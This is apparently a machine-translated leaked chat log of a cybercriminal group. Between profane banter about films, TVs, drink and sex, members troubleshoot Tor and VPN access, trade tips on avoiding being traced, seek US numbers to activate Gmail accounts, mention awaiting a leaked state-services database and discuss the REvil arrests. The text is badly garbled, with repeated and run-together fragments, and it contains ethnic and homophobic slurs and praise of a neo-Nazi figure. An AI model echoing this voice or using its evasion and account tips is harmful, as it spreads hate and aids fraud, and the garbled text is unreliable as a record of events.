And you can buy it )pro_googled it means) actually the light at the end of the tunnel is good, if not clinical death, but a way out of a dead end)I skipped it in anatomy?Well, like a tunnel, my teacher would have said orificeGuys, we have a secular state, and you're about religion)Asynchronous tunnel * well, it depends, maybe it's not a train but the way out of the ass)Just as long as it's not at the end of the tunnel)Just to be light) all good morning prayers nmap's name syn'a and ack'a, and holy yernet, ayypi-Hello ping!:joy:chpongvsem ping)47kcheto bitok at all flew to the pointSomeone here knows how to tincd set up? likewise, I'm gonna go watch a 2D commercial with Bruce Willis before he gets his 3D citizenship, but who the fuck knows, it's like, speedart cop VS vuman standup.and at the end - you're dodging:joy:I even had a 3D fuck somewhere... I'll never forget, at the beginning a girl takes off her thong and throws it at you, and you catch it... at the end...the projector also turned on 5 times and that's all the last was 42 and I sold it for fuck all 3 times:joy:with my father I dragged 75 inches into the house - they were exhausted) I will still watch porn in BP) but why am I a fool to take a TV and a projector)) everything is easier and cheaper))) well, hammer, 0.5 lakh you invested?What's the screen diagonal of 130 inches? A wingspan??? But as it turns out, watching anything is boring, all reviewed a million times over, you need to look for one.I have 130 inches at home I have 3 pieces of vga, vga-two-D-sub adapters and now I have rulitThe last week I looked through my friends for wire VG What it cost, it cost so much... 
CRT - how much it weighed...)))) and how much it cost just like that, D-sub only through an adapter nowadaysHow much it cost back in the day. I had a 19' LCD at 75 Hz. After that, I couldn't look at anything else. By the way, it was 100 Hz. CRT::grin:))) I rented a working 19'' monitor last year for FREE. I still have one 19'' monitor 24" - not bad it was also old - about 10 years oldMonitor with 3d have not seen, only heard me old monitor passive, also plugins / worms pumped, even an attachment for regular glasses somewhere wasO I have the same tablets, need to buy batteries or take out of the mother some 'activit' eyes :)I have by the way 3d-also activeMalom oculus quest grandfather gave him for the new year, that's where it is. Youtube 360 is great, I still have 0,5 ysb-cable with 3D-movies) And I think I took it in 15 or 16, I thought it would be cool, new sensations. But not properlo that humor is not flat was not laughing: "just 3D" * so you tell us the purpose for which you bought the 3d?!i wanted to keep it in the hut, which was sold, but i found out that 3d is not for sale and i took it away@jaime but i bought it in 14 years, i'm chipping/zombing/facinating and 3dNiruyusya) i have a tv with 3d, i never saw a movie, only fragments, but i have glasses :) i confirm )tv pastBuy the helmet VR i even have titanic 3D))) plugin of course the stores say that *not in demand* and they don't make them...BUT the site from which I downloaded 3D-movies is available (via VPN, etc., no direct access)... is it like a sanction?:joy:but they run it through a "3D plugin"...i dont know about sales and subtleties of technology, but maybe because no one "natively" shoots in 3D? imho, avatar is the only! movie for 3D, all the rest that i saw - parody (i still have 3D TV alive By the way, who knows why 3D TVs are not sold in our country? By the way, do you know why 3D TVs are not being sold?? 
They are not being sold now, and it seems to me that Cameron is afraid to release a sequel, because he knows that he will not be able to top it. I liked avatar, in early 2010 we went to the cinema (while waiting for the car), so DD, I did not want to go out there))) Avatar is a breakthrough and a culture shock, in a good way, although the story is not new ...Avatar is a breakthrough, in a good way, although the story is not new... this year it seems that the 2nd part should be the avatar of course, but the box office reflects the audience, and they vote with their moneyInteresting moment, the director who made this "Dune" that you did not like, wants to film A. Clark "A Date with Rama", and it is already a classic of world fantasy fiction... D.Villeneuve is his name, I'm not a pro, but a lot of people like his reincarnation of stories on the "big screen "Spiderman, Superman, Batman... spider man versus superman... batman on top of superman, superman behind speedman... fucking MENTAL war...as far as ST, after going under Disney's umbrella, the theme has rolled down (oh yeah! 200 the summer man is still a good movie chicwinterstellar i liked it i would not agree with you, space fiction is very little dnea, some bullshit i was sitting at a pc, it's more interesting to go to dns than to watch such crap...i fucking wanted to watch "star wars" as a kid, but now the airwaves are full of it... was it the last film, where aquaman plays duncan idaho? @angelo recently, my wife asked me to download pendo-canadian-hungarian "dunya", we watched it on 75 inch tv in uHD quality... My wife liked it, but to me it looks like *shitty*, I do not understand them in their fucking language :rofl:It's Blue Willis, who starred in Armageddon, in which a drunken Russkie in a hat was sitting on the space station for 5 years:joy:``Kicks on the cheeks "wake up," it's Statham !VityinkaWeldon how could it be? 
(http://upload.wikimedia.org/wikipedia/commons/thumb/d/d3/Jason_Statham_2018.jpg/250px-Jason_Statham_2018.jpg sorry for my transcription oh my god what is Statham? ay, cr...)))no, I think so myself Statham? what? Statham? better a president who can make jokes than a buffoon who wants to be "president":grin:president may butch and may butch may be president. there's no difference between them:laughing:or a clown from the 95th block who "is not a buffoon")better a moustache than a mangleheadZeus said, fuck the mustache and whammy)that in heaven, the propaganda on BT is sick to listen to)what am I missing from tv now?A village idiot in power happens more often than a thunderstorm, I understand, I have never seen a thunderstorm in my life in January.:astonished:it was still lucky, they could have been convicted of insulting the feelings of believers, it's fucked up that half the hospital could not perform urgent operations, but that's bullshit...and I also noticed that the whole story is a noteworthy article of the Criminal Code...khateNuda atu mistress ))here's a whole report came out)) yes now, the dumb pocket money showed that were in their pocketsAha and dough taken out from under the bed ))Fsbshnikov their balance on camera showed, like these guys, and the guys work in Yandex delivery. They Timlid said, here's a request from my colleagues from above, we need to shoot a commercial. Well here is such a history malyataeto when, after the magic word you remember all the sids, even those who do not know (I think we do not recognize crypto? And how did they seized the money in cryptocurrency? Is it in gypsy's or something? They had it at home? 
:)Fucking Russians, they write "dick, ass, cunt" and we don't understand what's going on, thanks a lot !I'm not "immediate" - I mean, unremarkable ;)my immediate goal is to fuck up a possible opponent !Angelo sptzovat razzavat chat *Husor *)esoteric finerprint...Aha and it corresponds to the original ))right, "Nado!", dick is a finerprintNot today))well not today))))))))))))))))))))Nado! )it's for the good of the PPNado, we'll show our dicks again...we're trying our best...our #general is the worst anti-detect, the mole is going nuts...Aha, and bug report )happens full crashtest bed, then two lists of bugs we need to fix bugs blowjob and after sex both testers write backlogtester + tester = crashtester ))it turned out the wife came, threw one big blanket in the old washing machine and run, she left, the old lady jumped wildly - here I am trudhanul:laughing:aha... before the New Year was a funny thing - I was sitting at the PC, drinking coffee, from the side of the GDP bang on TV - online conference ... ...and then a loud banging starts in the hallway... i thought they were taking the door out...we could have a little programmer))) tester + tester = programmer! she taught me) ok, i like sausage! i also saw a panda! i remember a panda from the girls, i did not even touch them (angelo sent them to the dictation?I remember there were two sisters who worked here, they are brothers / sisters Waczewski and I'm an angel :kissing:it's decided, we are the Pussy Guys! Anonymous means))) I personally Stern once said that we do not have a name and will not) but the PP cunt Angels Stern) Charlie's Angels?) Fucking Guys Why? we are like TT only PP we are called? nooname?) but it turns out the bulk in Ru sat like a multi-national revivals were not Khohls by any chance?The funny thing is the article that was used to detain the traffickers, judging by the video, they seized a Vigo. 
It's the news, they can write 100 people and 8 tanks, the question is about the detention, as if one guy had 15 cars14 people with 20 cars, why would he need a banana?)Well there are a lot of fuck-ups behind them no doubt, they fucked up not broke the payments, they fucked up everything and fucked up `I don't fuckin' know (c) `Yeah they fuckin' Rebels also not just amateurs, yes, with EvilCorp confused with emotet1000% that they sent the guys to rest, regroup and get new forces.Yeah, everywhere the same info ``. https://www.rbc.ru/politics/14/01/2022/61e171599a79479dde32112e Yes, the same piece of information is everywhere... ``I lied, it's the Revils and those are the EvilCorps... I could not find the source, but I need more information... The FSB captain's son-in-law / father-in-law is like, OK, you can keep the lions... So it seems that their story began and they worked there anyway), or they mowed down and hired them for cabbages.No, it can't be bullshit, they may have been detained and put on leave. What the fuck is this? The FSB does not cooperate with the U.S. Fuck the FSB detained the REvil hacker group that was sending out viruses to extort money after a request from the U.S. 
At 25 locations where 14 members of the organized criminal group seized more than 426 million rubles, including in cryptocurrency, 600 thousand dollars, 500 thousand euros, as well as computer equipment, cryptocurrencies used to commit crimes, 20 premium-class cars, purchased with the money obtained by criminal means.better make a strait between mexico and canada...don't end up in australiaada fuck, my pc is melting all the glaciers and then the radiation and to get heat and light the nuclear plants work and what about mega heat consumption and when they kick them out, let them give us their bitcoins, we can use them to kick the unconscious off the bitcoins - we get more) Greenpeace is an expert in this shit and the dough is dust in the eye...all the activists are hypocrites and cuntsAha Vernon's horse should be a bitch to walk!the most global polluter on the planet right now is Biden - he's a superstarter, *old fart*:zany_face:they took this eco-activist across the ocean on one of those big rattles, she didn't even bother to wipe her ass with a finger.. and the fact that plastic is in the world's oceans, they found bacteria feeding on that same plastic... 2e standards and hydrogen sulfideAha from carbon monoxide )I thought that when you have computers/farms smoking that the whole city suffocatesThis is virtual )*environmental damage from mining BTC* - how??? Not just merch)) Like a cyber whistlea could have bought a tesla)) he sold out long time ago, fucked up Musk honestly who has a lot of dogs? https://ru.investing.com/news/cryptocurrency-news/article-2128541 damn, magic is if it works, this is different...(c) some kind of magic with this toad :) waiting for me it came to life itself only it doesn't help.. does not want to work toadstool I mix it with tobacco 1/1 - normal frost something mixed up probably before the New Year I did not go through any bridge, with VPN + bridge = fine, @angelo do not smoke the whole plan will bring myself in shape..... 
but not today!!!! everything is going according to plan! )Connect a vpn of some kind, start tor and go in. It works, but not today)))))) how about the salary? - All according to planWhen in torus will not let in or in the toad) And what to do if this happens? I have not been touched by this at all. A week ago, with similar behavior toad, I transferred work to torus-browser port 9150, it helped ... but all through bridges is arranged ... Yes. Confirm the toad is not available to all. Thor pricks. @rocco @adam please correct the point is that "toad is normal" is not for everyone ...(toad is normalThat's the point I just fluffed normal.gitu all normal works? I can not do merge.on schedule and reporting statements.aka with zp how? he is on vacation for another couple weeks on his business.@frances Silver not aware of when it will be? colleague vmcontrol. Through cmd htrs://www.vmware.com/support/pubs/beta/viperltoolkit/doc/utilityappsdoc/vmcontrol.html in short, the 
answer - no way it is gray in WMware Workstation - I open the context menu on the desired VM, select Power - reset@all 3 VMs are running. one hangs. how to restart it without killing the others? write`http://waydro.id/#about`pahat nada, pahat (s)Yes I generalized in general. All sorts of tensions in the world can't help but have an effect on crypto. The 20th year - the tensions between the U.S. and Iran, the 21st year - the conflict in Karabakh, the 22nd year - Kazakhstan, it seems that its neighbors will break the cap any day now (I hope I'm wrong). All these are collapses, except for the last possible event, which the scumbags need. This is just me talking about the rubbish in the political and interstate arena of the crypto bloggers? their evans train a lot of crypto-traders and whalers i don't think so... i don't know... they're buying for bitcoins? it's only bad for investors, and it doesn't hurt traders. what difference does it make which way the news works? short! there's also another round of sanctions and arms shipment to the LdnR and again plush...well, it's typical. yesterday i struggled, 39 almost. and the rest of the market gave me a good deal today. it may not drop below 34 Wait, it will not break the number 2 but I don't think it's growing slowly, just for paychecks) 40 today I wonder if it will make it above 40, it's a real flower, it turns gas into nutrients. it's harmful, you should switch to photosynthesis) everything changes in this worldada alright... from accounting you're crying :smirk:I am listening to youLezhik Patsyunya from Zabnitsiyka mlekoda yes yes we know, are there apples and fat?russian ibelorussian what?))) Depending on what garden you work :grin:potatoes are different) potatoes? 
you think big, probably always a bag in the back)) where there are two, and four will fit))))) hahaha )so you live on one salary)))) take today's I am evil!Give me yours)) peace is war, work is rest, wage is evil, distracting from rest. down with wage!)) it's been waiting for a while now. you're right! we don't wait for nature's grace, we work. - i can't go there yet...yeah, i already did...it's ok with the git...so what about our git? will it work today? what about our git? @adamWhat about the other git? it works, bild start git?) demeTORius said he'll clean it up...and lots of gits...Garfield,@mitzi above @weldon is writing to you! @ned write back, there are a few questions samovozhvodit as if by default, it's good that I did not order the self-delivery) wagons are to steam locomotive) @Garfield I have a wagon of Trambs hang - finish pliz) @weldon I still finished the quest by inertia)) in general and personal files are available for download. found a contact who sent me a screenshotokho well, back to your quests) chet something I changed my mind. now the administration will wake up, clarity can make. something reset, something Potrutkwesti ass open:laughing:well in the diet, I do not log in. go further bugs look? :nerd:I am in a privately exchanged files with no one, so I do not know, whether it is stored there as well ya hz, I generally just found it)) how to delete this r? another point look plz, who files within the rocket exchanged when either in a personal correspondence. do not they still hang in the history? (click paperclip top right corner inside the conversation). in the general chat in the history from 12 october files hangs about my question?) just about the linksweldon hi hello, wrap the link before we get screwed) all see it?) editing function or something? kermit, hi. and why in your link letter S in https highlighted as that? 
what's the nuance of such? Thomas correctly says take for $ 5-10 vpsku and turn https://www.wireguard.com/)))) although Keanu Reeves ........ as an option? with deni devito, and you do not imagine yourself in the shower with men I got up `https://www.youtube.com/watch?v=0NZMyOgwFt8 ` @kermit if you hint at so, then leave your zatechushchu?) well, who has not shaved the ass?! had experience? is unlikely, then will shave your ass?Maybe everyone's getting ready for February 14th It's been quiet here lately) Benny to the admin group! @weldon answer502...Just what I needed - it does not work. yesterday Adam had it "repaired", if I understand correctly....:eyes:the day before yesterdayAnd the git is over?)@chad wonderfully )))))) smile ))Silent back.Ah-ah-ah you're OUR WEBSIGNER!!!!!!The silence is because everyone is afraid as if for a web-designer is not taken. damn, i thought so, i could use the bat and you just have someone pussyfooting around with the booze except the atheist, i didn't think)) he's an atheist under the circumstances i as a practitioner say that angels in 30 years will drink more than half of the whiskey from these barrels, i had half a liter of 8 liters angels drank in half a year. (there is a concept of a share of the angels, the barrels breathe and lose part of the alcohol fairly quickly, this loss is called the share of the angels) the hell he has left there in 30 yearshttp://www.youtube.com/watch?v=jzbK8Ah4UvU&t=135sbitua a barrel to drink )and then the bread is better to give beater))) geez, I'm also whiskey in a barrel now from the moonshine, six months already, can also keep, although I have 8 liters of all http://lenta.ru/news/2021/07/08/scotchwhisky/aga, I give you what? That's right - the horse! By the 18th birthday will be a fucking ageing give him cognac everything from his childhood ... 
no, honestly, I just do not want the little guy saw and smelled the booze from batimne it was possibleYou too childhood was not easy, I see it wasa I drank....i remember snitches from teachers' kids, i don't know... i don't know... strict upbringing, fear of ruining mom's reputation... but why teachers? i understand medical families who have alcohol... why?By the way from life experience, there is a third reason - my mother is a teacher, I know two of them, I pity them, they had a terrible childhood, you take it and stop, just flashbacks are left from the alkoshkabka you leak, you kill your health, and the brain is pathetic, or you are sick?i don't drink, don't fuck with me ))) what prevents him from wanting vodka, so that it would be icy, like from a well He probably had a supply of vodka, unlike some people It was funny where did @demetrius go? no, on his buttocks on his stomach probably)) i only have a supply of lettuce Have a supply> soon for driving? if you were driving, you'd already have vodka. for courage, they don't sell vodka at night... soon to drive? what prevents you from drinking vodka and saltsblamda and one-eyed people too>though in a religious country, if you cheat on the Koran they probably cut off your hand, it won't do any good there There are a lot of one-armed men among Muslims. Although in a religious country, if you cheat on the Koran, they probably cut off your hand, it won't work there, like in the joke about gentlemen playing cards, "Gentlemen, let's trust each other, we are gentlemen", I do not know if you know if there is a feature in Windows that allows you to dock windows on top of other windows without installing additional programs from outside the Internet, it's not you! Wild, almost did not read - in guestworkers))) You can tell - doing something) Very cool! Garfield really wrote himself? steep, however ... @Garfield in guestwriters do not want? ahrenissimo@collin see text pm? 
I remember the joke with the words: Son, you have a man poet! No dad, I just want my wife :D respect ))))+Git is alive?) most likely, that this man is available after registration ... and so only through the web-morda "portals" ... yes, I'm more that man will not find SMS-activate.gce it's like with cars - someone loves Lechus, and all here) that will not buy a Baja or Hyundai) Lechus only) well, I do not need a good video, I do not get a check, I go elan is good, no words, I wish I had a Dell Alienvar... But I pity 150K for the same hardware that you can get for 100, it just so happens that in our area is the only company that supplies computers for linux, windu does not dig, but I still keep it on four laptops because of a 30-year habit, but the last 10 years I go to Kali, and Dell - yeah, it's expensive, like Hewlett, but I personally have a great liking for Dell, because the founding dude started out in a garage, just like Wozniak-Wayne-Jobs, i.e., simply - very trustworthy, just disappeared from man's site, like curl apload to do... found an alternative) weldon is easier than planting drugsa can register an account at https://account.siasky.net or another portal, (there's a free account, like 200 gb files can be filled for free, for 5 bucks you can rent 1 ter place. And you can do it without an account, but your files will last only 3 months, then they will be deleted) funny, and the cops, what for? They can close the curl without it, at https://siasky.net somewhere it was written how to do it through the console utility siac: siac skynet upload only with siac software? @ruben , hello, how to upload files to skynet through the console / terminal? passport scans leakd why do you cut off your head for the retina? 
-- it is enough to leak the photo of the retina from the biometric database, and the leaks will be 100%. I also saw this article today)) But the cops can set someone up, like he committed a crime and has the proof. Ahaha, you do not even need to cut off your fingers, they will even be able to make a retina out of shit and sticks) I always said it was bullshit, biometrics. Your fingerprint can be hacked for $5 https://pastie.io/frcdxz. Yeah, it's up, it seems. Git will soon go up. Need a gmail one, maybe kk has an extra one? Not every number will do, TextNow US & CA will not roll (( Who has a US number to activate gmail? Oh man, it's not even a laptop, I mean Dell) Pretty expensive if there's no video card. The laptop or the station? Who has a US number to activate gmail? In summer my girlfriend bought an Asus - Ryzen 7 5700U / RAM 16 GB / SSD 500 and a carload of the latest stuff = 60K rub, I wanted the same myself... Congratulations!) I do not like American computers / laptops, all sorts of Dell/HP (bitches, exorbitant prices), especially Intel CPUs - 41K rub for what? For a laptop with a CD? Yeah, it looks like Git does not work. Yes, but is there a complete set all the same as usual? They are well assembled in the factory, Dell. What is the advantage of Dell as opposed to a custom build? Yes, now Linux seems to work everywhere, even if it supports video, but not all. Can't complete SOCKS5 connection to **.onion. (4) Yesterday it was fluffed - fine. Nah, Git does not work, he sows! Git works?
https://www.kns.ru/product/kompyuter-dell-vostro-3888-mt-3888-2918/ [undecryptable encrypted messages removed] Hey, overloaded the Rocket, see? Hi + all, have a nice weekend guys! Well, they wanted to draw attention to themselves, so they did. 0_neday, but that's just it, and yes) in short they shit themselves and try to get out. There are 3-4 topics, 10 pages of shit, maybe even more. They had 1 BTC in the guarantor, they were like their representative and intrigue...) Like their forum account had about a bit each week and then some dick came and said that REvil was hacked and their decryptor leaked, REvil himself came and said it was all bullshit, so they bet on 1 bit. The REvil group went offline for good; they were trying to measure each other's pussy in three threads, and as I understand it, they flunked out. What do you mean they measured each other's pussy? Reuters writes that REvil was hacked and shut down by several countries. After the Kaseya story and the mysterious disappearance of Unknown's representative, someone called "0_neday" appeared and announced that the group was back up and the sites (probably Happy Blog) had been restored from backups, but he was unaware that the backups had already been compromised by the secret services.
"The REvil ransomware gang restored infrastructure from backups, assuming they had not been compromised," commented Oleg Skulkin, deputy head of Group-IB's Computer Forensics Lab. "Ironically, the gang's favorite tactic - compromising the backups - was turned against them." Also, an unnamed, anonymous Reuters source claims that a certain foreign partner of the U.S. government carried out a hacking operation against REvil, which resulted in it being able to break into REvil's computer architecture. "The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups," said Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations. "REvil was at the top of the list." "Before, you couldn't hack into these forums, and the military didn't want to have anything to do with it. Since then, the gloves have come off." It turns out that not only the FBI and Secret Service, but also military analysts from U.S. Cyber Command have been searching for REvil all this time. According to U.S. Deputy Attorney General Lisa Monaco, attacks on critical U.S. infrastructure should be considered a national threat to the United States. Consequently, such actions by the groups led the U.S. Department of Defense and military intelligence to step in to actively counter the lockers. Good + While the norms nerf) @ruby toad updated, should I address Adam? Am I the only one who's stalling? Hi. Can't get in? So you're ruby!!!)) Here's the thing. Good morning, the toad won't let me in in the morning. Good morning everyone, thank you. https://play.google.com/store/apps/details?id=dev.darwinsoft.marsvpn this one? Or this one?
https://apps.apple.com/us/app/mars-vpn-betternet/id1446855878 Mars -- it's a VPN. Doubleplus, seems to work now. I added money in advance, but the thing did not work, I had to press the renew button by hand, although the corresponding checkboxes in the panel were set. Mars works. What's up with Mars? How so... "234 circuits completed, 0 were unusable" - I haven't met such wording) Browser, where's the log? Tor Browser is complaining about the connection: ``` 12/14/21, 09:15:16.328 [WARN] Guard $D.... is failing an extremely large amount of circuits. This could indicate a route manipulation attack, extreme network overload, or a bug. Success counts are 9/235. Use counts are 0/0. 234 circuits completed, 0 were unusable, 225 collapsed, and 226 timed out. ``` It's working outside the Lux... The network itself seems to be weird. There's this. Weird, my Mars has been down for the second day now.
It works. [undecryptable encrypted messages removed] Of Tors: the one I have in containers does not connect directly without a VPN, although I got bridges for it (does not connect, that's all, and it does not allow changing/requesting new bridges... nonsense); the other Tor connects (also with bridges) without a VPN from the same provider, I don't know why, versions are the same and both worked recently... And torrent trackers for new movies without a VPN do not scroll through Tor on a regular home PC :pensive: I wanted to raise my own bridge on a separate instance of my own, but it does not cling, not through any bridge (does anyone have a Tor Browser that works without a VPN?) I'm not going to give you a gift for New Year's Eve, I'm going to get some Corvalol... I'm not going to give you a gift for New Year's Eve, but I'm going to give you something for your own sake... I thought it was the old one))) Well, yes. The picture is small. Okay. And the file you download?
Bad Request, it wrote now. May I try too....)) Re-logged? Yes. Gone? Encryption (benny all visible messages). chpong + chpong ping. Alf, try to leave and come back in 5. Go try to re-login, maybe repeat? Something strange. We're waiting for the Gosuslugi (State Services) database, and it's still not there. OK, Alf, you just have a status message at the bottom that you're trying to upload a file; it has been hanging since lunch. Kot is not jealous. I tried to send a picture of 100 KB. The chat wrote that everything is OK, but no picture in the chat? :grin: I called the guy, silent. Yes, Alf. @rocco @adam assess the problem... Maybe temporarily end his session? Someone said he stopped responding. Is it someone else exploiting the vulnerability? Poke a wand for starters. Is he really pouring the file? Maybe text him? "Piss in one hand, dream in the other and see which one fills up fastest" (c) Any movie. Consider it a classic. "Fuck you, motherfuckers" (c) Bad Santa, great movie for the New Year. With the download, I mean. Before that, everything was `is uploading`. Well, he interrupted from time to time. The main thing is that it was not Bad Santa. I came here just for this information)))) The main thing is that our shuttle did not put it in the end. Yes, in fact?) Alf is on firebombing. More likely the raw material) Alfons decided to fill up the archive of Gosuslugi?) About infinity. "Here you can put pictures in the chat room? 11:25 AM" - "looking forward to it !!! 4:11 PM" - "looking forward to it !!!" How long has he been uploading? The whole team is in suspense? How is the situation? Almost the president of "nezalezhnaya", only he played the piano... Why do we need a dick without a dick, when we have a dick to dick with... junk, but still a dick-artist of a fucking masterpiece? In addition to the theme of dicks `https://www.youtube.com/watch?v=L93vYKnqG7c` + test, to look at these artists? Who likes it! I am also against dicks in the chat room!
Well, you can not))), all here, monitor the chat, in case something important comes up :sweat_smile: Wankers... again for hand-to-hand violence... Weldon, you all hope, or Fransesco, who will be in charge, wait for what picture? Hopefully it will not be a card from Santa Claus at 2 bits) Your will - our hands :grin: Jerk off for me, brothers! And we will have a fit of fighting, cheater, now you go away, we will see this picture. I ran away for an hour, if anything I am here! I hope there will be a snow maiden naked at 18. I hope there will be a postcard with Santa Claus at 6 gig in ultra HD. He even stopped answering) It has to stop, I think when it boots, the Rocket is fucked) I heard the modem buzzer :laughing: He just downloaded by dialup from the 90s. Guys, everything is in our hands! Save us guys, we're already cold sitting with our pants down, when will it start, it's itching, Tom?) Well, what about the picture? All in anticipation already) Dogs also want to. Which key? I ordered a Raspberry Pi 4, I need to revive the home server) 10 GB of porn may be uploaded by Alfons himself to Rocket to DDoS) pong ping "in all positions" thesis "how I spent my summer with the Snow Maiden". Alfons, I have been downloading it for 5 minutes) What's going on there) The Omicron virus is just bursting with laughter) The covid mask, I'll sew the foreskin on it, it's so lame. So someone here is a Jew who got circumcised??? :laughing: Rocket Elon Musk, whose face? )))))))))))))) Yes. [ASCII art]
[ASCII art] Pictures you can, I guess, if they're not pics with geo tags. Can you put pictures in the chat room? It's our secret, just shhhh, when pussy lovers pose in front of your face )) Yes, ladies love trance. Well, do not listen to such a thing, glory to the KPSS! Thank Allah, we won't tell anyone)) Good thing he's not here) or you'd have been fired) Alf, don't forget what Silver said about references, so you don't want to fuck anyone else. I can't understand how you can pay money to clean your shit, so order a housekeeper. At my age a housekeeper is like a sphere of intimate services. I can't imagine, it's hard. Think about it, she washes the floor upside down. Why the housekeeper, if the wife can be talked through by her husband with caressing and violence? Aggressive sex is pleasant and somehow not expedient. There's another case) Angelo likes a sharper relationship. Washed? Armin van Buuren / Paul van Dyk / DJ Tiësto. Fuu, a face to keep the pussy hanging out. Yeah, well, yeah) Listen))))) Yeah, we know )))))))))))) I like trance and I like her. Weldon, you don't go all trancey here. Aha, and the dishes! And say it's your mutual decision and then you will forever clean the floors. Not trance?) And if she drags you in? Cruel)) You've got a fantasy) You can fuck her and fuck yourself at the same time :D The model is Polish and kind of an MMA fighter. Tomas, you should be afraid of her. What for, Kamil? Then you'll ask her to take you for money. Be careful what you wish for) Franz, give her. Ah yes, that's why I go to my workplace) Fuck, give me `Kamila Smogulecka`, but then you can not watch the movie. Better, of course, to excite them. What else should I do with them?
Then they're turned on) and then they're turned on, seen every single day. @thomas, have rabbits/cats/parrots, although they also "turn on" their wives) cunnilingus :grin: A friend is a friend, my friend... (c) folk tales. I remember how a friend wanted to share with me... a friend, let him share. Where can I get a wife? I also want to watch something... no, but I already know what I'm gonna watch today with my wife) @angelo, haven't seen the movie *Happy End* 2021, about a hacker-programmer and a novice porn actress?? Let him twitch, then you have to get a wife. Old age for us men is when you can't beat yourself up in the morning with freshly squeezed juice, cereal and a jerk off for forgetting and a cup of cocoa on top. Take it and you have to do it! Well, it does not work - "always young and always drunk") Veldon, you're suffering, my friend, buy new shock absorbers)) My wife came, turned on the old washing machine, put in a blanket and left) The washing machine, from the shift in the center of gravity, began to jump hard (like the khokhols on Maidan))) Oooh, what on the server is not turned off? Aaaa, like a comment or code? So previews do not merge? This is it, get it?) I wrapped myself in foil, I feel protected. Here someone started banging hard on the door, just as if they were breaking in... A mate recently had a joke: sitting at the PC, drinking coffee, behind him on TV Putin speaks at an online conference... in a condom in gold paper) [ASCII art: "you're a cunt, 3 behind you are on their way"] Fucking Thomas, urgently edit, at least wrap the links) How old I am, just hardcore, it's not even IRC, whatever they were called. Aah, and remember the forum sites still on telnet channels?) @hammer there is something to jerk off to! Cool pictures! I heard it from a spammer. Fucking spammers!
[ASCII art] We'll make our own party with blackjack and whores. [ASCII art]
[ASCII art] Efrain started yesterday already :joy: Angelo already started IRC then :) You already have a picture floating) Where to start?) Start [ASCII art] The main thing is not to sew) and then sell) only domestic, only safe product. Pasha Durov will not do shit, VK fuckin', goddamn shit - we'll sell sequined sneakers! To calculate someone from the online is easy now, so much data is collected, it is just mega paranoia. Tor and VPN, you still need to disable automatic logins to messengers. Let's make a VK group) Order taken.
Expect it; it's clear that the timing of the attack has not been canceled by anyone, but the libcaca logo is appropriate. The host machine still needs to be covered with some serious VPN. Yes, Tor is bullshit, let's do a VK group) it is no panacea for security > I remember there was a plugin for mplayer which encoded the film into ASCII and showed it with the help of letters in the console) With ffmpeg and libcaca you can render video to ASCII... Fuck, they say... And in the heat it's behind the Tor... Motherland is where the ass is warm... Motherland, my brothers, the cats, the gang, the office, the Soviet Union, I serve! I remember there was a plugin for mplayer that encoded the movie into ASCII and showed it with the help of letters in the console) I'll go, but I will not go! You're the only one who will get a bonus out of all! You think it's so easy!? I'm trying here, are you trying to banish? Go rest, go away from the chat, all go away, let's hope no one started jerking off :D Ahahah, nee where?) The hell with it, with the head, a girl for Weldon found [ASCII art] Let's train before tomorrow, and you write like it's the last time) The bot is with you, why such difficulties? Did you download this script to convert pics for the console?
[ASCII art] And in the blockchain on SSD, well, and [ASCII art] Welcome all: Happy New Year. Yeah, I was surprised myself. I thought we were out of bitcoin) > that 1 USDT == 1 BTC well... from your math, my lord))) sorry) I fucked up. Elroy, I corrected it))) 1 USDT == 1$. It seems to me that 1 USDT == 1 BTC. Well, it's fiat: USDT, it seems [ASCII art: MERRY CHRISTMAS 🎄🎅🎁] or should I say "fart"? Yeah, after salads. Fart is a fart or what? @kermit, U2! Or crypto is BNB, confused?
Fart in the new year. @all happy holidays to you guys! Write it down) God can not be so irresponsible, this is the proof of his absence with age) Or I will understand that there is a god. Breathe, breathe it (c) I'm the alpha and omega, the beginning and the end, I'm the beginning and the end, I'm the beginning and the end, I'm the omega, I'm the beginning and the end, I'm the beginning, I'm the omega, I'm the beginning and the end, I'm the omega, I'm the beginning and the end, I'm the omega, I'm the beginning and the end, I'm the omega, I'm the omega, and I'm the end, I'm the omega, and so is everything here. If there is no god, then nobody will work here, I wish him too, and he's the wish-fulfillment, that's it, my friend. It's okay, my friend, to wish you reason and health. And I'm asleep. Not fat, but body-positive. Glory to Tesak! It's a fat troll, I answer you. Glory to Russia! Is that better? Appreciate each other and believe in sex. Hail Satan! Good! Ugh on you... Men, fry each other's hands. @kermit @angelo listened and left the chat room, like in South Park. What? Hmmm, love each other, love each other and believe in love. You're making a fuss about my asshole. Good night, my dears. He's got a rocky ass. No) just wondering who started it. Then we'll all lose, Angelo. No, I lost. We're having a sit-down? He's been here longer than you. Yeah, well... I flew in, you know))))))))))))) > For the eternal flight of desires and aspirations. How did you get here?
With such aspirations: coffin, coffin, cemetery, faggot. The eternal flight of desires and aspirations. That's not what I asked) I am for eternal life. @brent, are you for cremation or for a coffin? In 2014 they won the Nobel for this "not theory". There's already a direct application. Buddha is top! No. Not a theory. If I were a believer I'd probably be a Buddhist. I don't know, I can't speak a hundred percent about the big bang as my knowledge doesn't allow it. But then again all this is theory. Angelo, you are fundamentally wrong. In your own words, if you can. Thank you in advance... I won't tell you anything, because it all comes down to theory and nothing more. Well, it's a secret) Well, tell me, please. I know that) Believe in the big bang and watch The Big Bang Theory. That's why I don't believe it. Apparently they have it, forget it. How many boys were raped?! Well, Catholics also keep secrets. I see, I think you believe in God, but you keep secrets. http://lurkmore.to/%D0%9C%D0%BD%D0%B5_%D0%B2%D0%B0%D1%81_%D0%B6%D0%B0%D0%BB%D1%8C "Llan, everyone jerks off however they want." Yes, Ker, 6 years. How long have you been here? God is my god! Kermit, drop the knife, Efrain is joking! No. I'm a development engineer. Creator, according to you.
